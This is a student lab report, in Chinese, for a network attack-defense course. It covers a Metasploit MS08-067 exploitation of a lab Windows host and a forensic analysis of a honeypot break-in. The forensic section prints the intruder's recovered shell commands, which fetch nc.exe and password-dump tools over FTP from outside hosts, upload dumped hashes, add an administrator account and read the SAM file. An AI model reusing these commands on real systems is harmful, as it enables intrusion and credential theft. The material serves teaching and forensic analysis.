# 20232827 2023-2024-2 《网络攻防实践》实践六报告

1.实践内容

（1）动手实践Metasploit windows attacker
任务：使用metasploit软件进行windows远程渗透统计实验
具体任务内容：使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击，获取目标主机的访问权
（2）取证分析实践：解码一次成功的NT系统破解攻击。
来自212.116.251.162的攻击者成功攻陷了一台由rfp部署的蜜罐主机172.16.1.106,(主机名为lab.wiretrip.net)，要求提取并分析攻击的全部过程。
攻击者使用了什么破解工具进行攻击
攻击者如何使用这个破解工具进入并控制了系统
攻击者获得系统访问权限后做了什么
我们如何防止这样的攻击
你觉得攻击者是否警觉了他的目标是一台蜜罐主机？如果是，为什么
（3）团队对抗实践：windows系统远程渗透攻击和分析。
攻方使用metasploit选择漏洞进行攻击，获得控制权。（要求写出攻击方的同学信息、使用漏洞、相关IP地址等）
防守方使用wireshark监听获得的网络数据包，分析攻击过程，获取相关信息。

2.实践过程

2.1 动手实践Metasploit windows attacker
查看winXPAttacker的IP地址为192.168.200.3

使用Win2kServer作为靶机，如图二所示，靶机IP为192.168.200.124

打开cygwin shell，并输入命令msfconsole等待Metasploit加载完成。

然后我们使用MS08-067漏洞

然后我们设置攻击载荷为TCP反向连接载荷，并设置lhost为攻击机IP，rhost为靶机IP

最后使用命令exploit即可获取靶机的Shell

攻击成功后，就进入到了靶机的命令行界面，输入ipconfig/all就可以查看靶机的相关信息了
2.2取证分析实践：解码一次成功的NT系统破解攻击
打开kali,在kali上下载

下载好后用wireshark打开
将过滤条件设置为：ip.addr==172.16.1.106 and http

第117行出现一个字符 %C0%AF，百度之后得知…%C0%AF…为“/”的Unicode编码，因此猜想靶机存在Unicode解析错误漏洞。

140这行，看到一个msadcs.dll文件

对第149行进行HTTP流追踪，发现一行数据为 --!ADM!ROX!YOUR!WORLD!，搜索之后了解到这应该是一个RSD漏洞攻击

在HTTP流中还发现了一组shell脚本代码：

将这种代码全都提取出来，得到如下结果：

shell (“cmd /c echo werd >> c : f u n ” ) ;
shell ( “cmd /c echo user johna2k > ftpcom” ) ;
shell ( “cmd /c echo hacker 2000 >> ftpcom” ) ;
shell ( “cmd /c echo get pdump.exe >> ftpcom” ) ;
shell ( “cmd /c echo get nc.exe>>ftpcom” ) ;
shell ( “cmd /c echo quit>>ftpcom” )
shell ( “cmd /c ftp – s : ftpcom- n www.nether.net” ) ;
shell ( “cmd /c pdump .exe>>new.pass” ) ;
shell ( “cmd /c echo userjohna2k > ftpcom2 ” ) ;
shell ( “cmd /c echo hacker2000>>ftpcom2 ” ) ;
shell ( “cmd /c put new . pass>>ftpcom2 ” ) ;
shell ( “cmd /c echo quit>>ftpcom2 ” ) ;
shell ( “cmd /c ftp -s : ftpcom2 – n www.nether.net” ) ;
shell ( “cmd /c ftp 213.116.251.162 ” ) ;

shell ( “cmd /c echo open 213.116.251.162 > ftpcom ” ) ;
shell ( “cmd /c echo johna2k > ftpcom” ) ;
shell ( “cmd /c echo hacker2000>>ftpcom” )
shell ( “cmd /c echo get samdump.dll>>ftpcom” ) ;
shell ( “cmd /c echo get pdump.exe>>ftpcom” ) ;
shell ( “cmd /c echo get nc.exe>>ftpcom” ) ;
shell ( “cmd /c echo quit>>ftpcom” ) ;
shell ( “cmd /c ftp – s : ftpcom ) ;

shell ( “cmd /c open 212.139.12.26 ” ) ;
shell ( “cmd /c echo johna2k>>sasfile ” ) ;
shell ( “cmd /c echo haxedj00>>sasfile ” ) ;
shell ( “cmd /c echo get pdump.exe>>sasfile ” )
shell ( “cmd /c echo get samdump.dll>>sasfile ” ) ;
shell ( “cmd /c echo get nc.exe>>sasfile ” ) ;
shell ( “cmd /c echo quit>>sasfile ” ) ;
shell ( “cmd /c ftp – s : sasfile ” )

shell ( “cmd /c open 213.116.251.162 ” ) ;
shell ( “cmd /c echo johna2k>>sasfile ” ) ;
shell ( “cmd /c echo haxedj00>>sasfile ” ) ;
shell ( “cmd /c echo get pdump.exe>>sasfile ” ) ;
shell ( “cmd /c echo get samdump.dll>>sasfile ” ) ;
shell ( “cmd /c echo get nc.exe>>sasfile ” ) ;
shell ( “cmd /c echo quit>>sasfile ” ) ;

shell ( ” cmd / c C : ProgramFiles CommonFiles system msadc pdump.exe > > yay.txt ” )
shell ( ” cmd / c C : ProgramFiles CommonFiles system msadc pdump.exe > > yay.txt ” )
 
shell ( ” cmd / c pdump.exe >> c : yay.txt ” )
shell ( ” cmd / c net session > > yay2.txt ” )
shell ( ” cmd / c net session > > yay2.txt ” )
shell ( ” cmd / c net users > > heh.txt ” )
shell ( ” cmd / c net users > > c : heh.txt ” )
 
shell ( “ / c n e t localgroup Domain Admin I W A M _ K E N N Y / A D D ” )
shell ( “ / c n e t user testuser UgotHacked / A D D ” )
shell ( “ / c n e t localgroup Administrators testuser / A D D ” )
 
shell ( ” cmd / crdisk – / s ” )
shell ( ” cmd / crdisk – s “ )
shell ( ” cmd / crdisk ” )
shell ( ” cmd / crdisk – / s ” )
shell ( ” cmd / crdisk – s “ )
shell ( ” cmd / crdisk / s –“ )
shell ( ” cmd / crdisk / s –“ )
shell ( ” cmd / crdisk / s –“ )
 
shell ( ” cmd / c typec : winnt repair sam . _ > > c : har.txt ” )
shell ( ” cmd / c delc : inetpub wwwroot har.txt ” )
shell (” cmd / c delc : inetpub wwwroot har.txt “)

攻击者使用了什么破解工具进行攻击？攻击者利用口令破解工具和nc.exe来实现对目标主机的攻击，Nc.exe：完成远程主机连接等工作。

攻击者如何使用这个破解工具进入并控制了系统？完成远程主机连接后，利用telnet操作实现对操作系统的控制。

我们如何防止这样的攻击？及时下载厂商提供针对这类漏洞的相关补丁

你觉得攻击者是否警觉了他的目标是一台蜜罐主机？
2.3团队对抗实践：windows系统远程渗透攻击和分析
实验环境：
先把靶机和攻击机都设置为桥接模式，将靶机设置为自动获取IP地址。
攻击机：192.168.239.225
靶机：192.168.239.103
测试连通性

先msfconsole:


攻击成功，通过命令创建文件夹tzq123

此时，靶机处多了一个文件夹

抓包：

3.学习中遇到的问题及解决

• 问题1：实验三中无法连接成功
• 问题1解决方案：靶机和攻击机都要设置为桥接模式，win2k设置网络
• 问题2：kali设置为桥接模式后就没网了
• 问题2解决方案：后来重启了几次就行了。。。

4.实践总结

通过动手实践Metasploit windows attacker，我深入了解了Metasploit工具的使用方法，并掌握了对Windows系统进行远程渗透攻击的技能。其次，通过取证分析实践，我学会了如何分析一次成功的NT系统破解攻击，包括攻击者可能采用的工具、攻击过程和攻击目标。最后，在团队对抗实践中，我体验了攻防对抗的过程，既能够利用Metasploit选择漏洞进行攻击，也能够利用Wireshark监听网络数据包来分析攻击过程，从而更全面地理解了攻击和防御的策略。这次实验不仅提升了我的动手能力，也增强了我对网络安全的认识。

参考资料

前人的博客

• https://blog.csdn.net/lbxyzj/article/details/130114018?csdn_share_tail=%7B%22type%22%3A%22blog%22%2C%22rType%22%3A%22article%22%2C%22rId%22%3A%22130114018%22%2C%22source%22%3A%22lbxyzj%22%7D
• 【20199114 2019-2020-2 《网络攻防实践》第七周作业 - 王昱皓 - 博客园】https://www.cnblogs.com/wongyoho/p/12699425.html